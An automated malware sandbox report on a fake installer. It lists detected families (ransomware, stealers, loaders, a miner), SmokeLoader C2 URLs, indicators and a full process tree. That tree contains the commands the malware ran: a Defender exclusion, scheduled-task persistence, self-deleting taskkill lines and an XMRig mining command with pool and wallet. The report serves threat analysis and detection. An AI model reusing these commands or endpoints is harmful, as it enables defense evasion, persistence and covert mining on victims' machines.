djvu | 8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e

Resubmissions

13-09-2021 13:00

210913-p826aadfh4 10

12-09-2021 18:18

210912-wxzpcafeel 10

Analysis

max time kernel
53s
max time network
1829s
platform
windows7_x64
resource
win7v20210408
submitted
12-09-2021 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

3.4MB
MD5

7279aeead22b91c8176ee932377f2e27
SHA1

169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
SHA256

8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
SHA512

8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697

Score

10^/10

djvu glupteba metasploit raccoon redline smokeloader socelars xmrig aspackv2 backdoor dropper infostealer loader miner ransomware stealer suricata trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Detected Djvu ransomware 1 IoCs

resource	yara_rule
behavioral3/memory/3032-351-0x0000000003190000-0x00000000032AB000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral3/memory/2392-280-0x0000000003BA0000-0x00000000044BE000-memory.dmp	family_glupteba
behavioral3/memory/2392-281-0x0000000000400000-0x0000000001BB7000-memory.dmp	family_glupteba
behavioral3/memory/912-356-0x0000000000400000-0x0000000001BB7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	1096	rundll32.exe	52
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	1096	rundll32.exe	52

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral3/memory/2088-312-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

resource	yara_rule
behavioral3/files/0x00030000000130c6-112.dat	family_socelars
behavioral3/files/0x00030000000130c6-163.dat	family_socelars
behavioral3/files/0x00030000000130c6-172.dat	family_socelars
behavioral3/files/0x00030000000130c6-171.dat	family_socelars
behavioral3/files/0x00030000000130c6-155.dat	family_socelars

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

resource	yara_rule
behavioral3/memory/3056-365-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral3/files/0x00030000000130c0-75.dat	aspack_v212_v242
behavioral3/files/0x00030000000130c0-76.dat	aspack_v212_v242
behavioral3/files/0x00030000000130bf-77.dat	aspack_v212_v242
behavioral3/files/0x00030000000130bf-78.dat	aspack_v212_v242
behavioral3/files/0x00030000000130c2-81.dat	aspack_v212_v242
behavioral3/files/0x00030000000130c2-82.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
1636	setup_installer.exe
700	setup_install.exe
1580	Sun152260a303c33a7.exe
1772	2.exe
1628	DllHost.exe
1292	Sun157a449716c8ee483.exe
940	Sun1584240df9fe73a3.exe
1608	Sun157ff8e4440aa.exe
988	Sun150faeb3537d.exe
1532	Sun15b61bf18b0f1.exe
2044	LzmwAqmV.exe

Loads dropped DLL 35 IoCs

pid	Process
1972	setup_x86_x64_install.exe
1636	setup_installer.exe
1636	setup_installer.exe
1636	setup_installer.exe
1636	setup_installer.exe
1636	setup_installer.exe
1636	setup_installer.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
700	setup_install.exe
432	cmd.exe
1768	cmd.exe
1768	cmd.exe
1232	7159022.exe
1232	7159022.exe
2016	cmd.exe
1360	cmd.exe
860	cmd.exe
1376	cmd.exe
1772	2.exe
1772	2.exe
592	cmd.exe
1292	Sun157a449716c8ee483.exe
1292	Sun157a449716c8ee483.exe
1628	DllHost.exe
1628	DllHost.exe
988	Sun150faeb3537d.exe
988	Sun150faeb3537d.exe
2044	LzmwAqmV.exe
2044	LzmwAqmV.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
328	2192	WerFault.exe	74
2788	1232	WerFault.exe	93
1316	2360	WerFault.exe	78
2264	2280	WerFault.exe	76
2872	1284	WerFault.exe	95
2636	1400	WerFault.exe	94

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DllHost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2516	schtasks.exe
1164	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2560	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1032	taskkill.exe
2768	taskkill.exe
1628	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun150faeb3537d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun150faeb3537d.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1628	DllHost.exe
1628	DllHost.exe
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found
1212	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1628	DllHost.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	1608	Sun157ff8e4440aa.exe
Token: SeCreateTokenPrivilege	988	Sun150faeb3537d.exe
Token: SeAssignPrimaryTokenPrivilege	988	Sun150faeb3537d.exe
Token: SeLockMemoryPrivilege	988	Sun150faeb3537d.exe
Token: SeIncreaseQuotaPrivilege	988	Sun150faeb3537d.exe
Token: SeMachineAccountPrivilege	988	Sun150faeb3537d.exe
Token: SeTcbPrivilege	988	Sun150faeb3537d.exe
Token: SeSecurityPrivilege	988	Sun150faeb3537d.exe
Token: SeTakeOwnershipPrivilege	988	Sun150faeb3537d.exe
Token: SeLoadDriverPrivilege	988	Sun150faeb3537d.exe
Token: SeSystemProfilePrivilege	988	Sun150faeb3537d.exe
Token: SeSystemtimePrivilege	988	Sun150faeb3537d.exe
Token: SeProfSingleProcessPrivilege	988	Sun150faeb3537d.exe
Token: SeIncBasePriorityPrivilege	988	Sun150faeb3537d.exe
Token: SeCreatePagefilePrivilege	988	Sun150faeb3537d.exe
Token: SeCreatePermanentPrivilege	988	Sun150faeb3537d.exe
Token: SeBackupPrivilege	988	Sun150faeb3537d.exe
Token: SeRestorePrivilege	988	Sun150faeb3537d.exe
Token: SeShutdownPrivilege	988	Sun150faeb3537d.exe
Token: SeDebugPrivilege	988	Sun150faeb3537d.exe
Token: SeAuditPrivilege	988	Sun150faeb3537d.exe
Token: SeSystemEnvironmentPrivilege	988	Sun150faeb3537d.exe
Token: SeChangeNotifyPrivilege	988	Sun150faeb3537d.exe
Token: SeRemoteShutdownPrivilege	988	Sun150faeb3537d.exe
Token: SeUndockPrivilege	988	Sun150faeb3537d.exe
Token: SeSyncAgentPrivilege	988	Sun150faeb3537d.exe
Token: SeEnableDelegationPrivilege	988	Sun150faeb3537d.exe
Token: SeManageVolumePrivilege	988	Sun150faeb3537d.exe
Token: SeImpersonatePrivilege	988	Sun150faeb3537d.exe
Token: SeCreateGlobalPrivilege	988	Sun150faeb3537d.exe
Token: 31	988	Sun150faeb3537d.exe
Token: 32	988	Sun150faeb3537d.exe
Token: 33	988	Sun150faeb3537d.exe
Token: 34	988	Sun150faeb3537d.exe
Token: 35	988	Sun150faeb3537d.exe
Token: SeDebugPrivilege	1628	DllHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1972 wrote to memory of 1636	1972	setup_x86_x64_install.exe	29
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 1636 wrote to memory of 700	1636	setup_installer.exe	30
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 752	700	setup_install.exe	32
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 432	700	setup_install.exe	33
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 2016	700	setup_install.exe	42
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 552	700	setup_install.exe	39
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1376	700	setup_install.exe	34
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 1768	700	setup_install.exe	35
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 860	700	setup_install.exe	36
PID 700 wrote to memory of 592	700	setup_install.exe	37

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS46697E25\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe
      4⤵
      Loads dropped DLL
      PID:432
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun152260a303c33a7.exe
        
        Sun152260a303c33a7.exe
        5⤵
        Executes dropped EXE
        
        PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe
      4⤵
      Loads dropped DLL
      PID:1376
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun15b61bf18b0f1.exe
        
        Sun15b61bf18b0f1.exe
        5⤵
        Executes dropped EXE
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15223697c98.exe
      4⤵
      Loads dropped DLL
      PID:1768
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun15223697c98.exe
        
        Sun15223697c98.exe
        5⤵
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe
      4⤵
      Loads dropped DLL
      PID:860
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun157ff8e4440aa.exe
        
        Sun157ff8e4440aa.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:600
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:2732
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:2516
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:2100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:2836
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:1164
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:572
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        
        PID:912
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:1408
        
        C:\ProgramData\4733914.exe
        
        "C:\ProgramData\4733914.exe"
        8⤵
        
        PID:2272
        
        C:\ProgramData\7159022.exe
        
        "C:\ProgramData\7159022.exe"
        8⤵
        Loads dropped DLL
        
        PID:1232
        
        C:\ProgramData\7159022.exe
        
        "C:\ProgramData\7159022.exe"
        9⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 712
        9⤵
        Program crash
        
        PID:2788
        
        C:\ProgramData\1393611.exe
        
        "C:\ProgramData\1393611.exe"
        8⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1792
        9⤵
        Program crash
        
        PID:2636
        
        C:\ProgramData\7742387.exe
        
        "C:\ProgramData\7742387.exe"
        8⤵
        
        PID:1284
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1284 -s 1716
        9⤵
        Program crash
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\is-DDE5L.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DDE5L.tmp\setup_2.tmp" /SL5="$A012C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\is-7EP5I.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7EP5I.tmp\setup_2.tmp" /SL5="$2018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\is-KHIPH.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KHIPH.tmp\postback.exe" ss1
        11⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8.exe"
        7⤵
        
        PID:2192
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2192 -s 1396
        8⤵
        Program crash
        
        PID:328
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:2232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe
      4⤵
      Loads dropped DLL
      PID:592
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun150faeb3537d.exe
        
        Sun150faeb3537d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:1032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe
      4⤵
      Loads dropped DLL
      PID:1360
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun1584240df9fe73a3.exe
        
        Sun1584240df9fe73a3.exe
        5⤵
        Executes dropped EXE
        
        PID:940
      - C:\ProgramData\5519919.exe
        
        "C:\ProgramData\5519919.exe"
        6⤵
        
        PID:2280
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2280 -s 1740
        7⤵
        Program crash
        
        PID:2264
      - C:\ProgramData\5490532.exe
        
        "C:\ProgramData\5490532.exe"
        6⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:2532
      - C:\ProgramData\5838797.exe
        
        "C:\ProgramData\5838797.exe"
        6⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1720
        7⤵
        Program crash
        
        PID:1316
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun150d896340a863.exe
      4⤵
      PID:552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone
      4⤵
      PID:1232
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun157a449716c8ee483.exe
        
        Sun157a449716c8ee483.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1292
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun157a449716c8ee483.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun157a449716c8ee483.exe" & exit
        6⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\taskkill.exe
        
